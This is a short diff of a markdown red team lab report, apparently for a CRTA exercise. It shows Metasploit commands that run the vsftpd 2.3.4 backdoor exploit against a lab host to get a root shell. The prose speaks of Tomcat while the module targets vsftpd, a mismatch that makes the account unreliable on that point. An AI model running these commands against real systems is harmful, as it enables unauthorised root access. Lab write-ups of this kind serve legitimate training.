GalileoQ/ObsidianGIT/CRTA/Red Team Report (CRTA).md

 # Find a functional exploit
 We launched Metasploit and searched for exploits related to this version of Tomcat.

+We properly configured the exploit:
 ```python
 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.16.25.2
 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
 ```

+This exploit run a Backdoor Command Execution and provides us with a root shell

 ![[Pasted image 20250512145918.png]]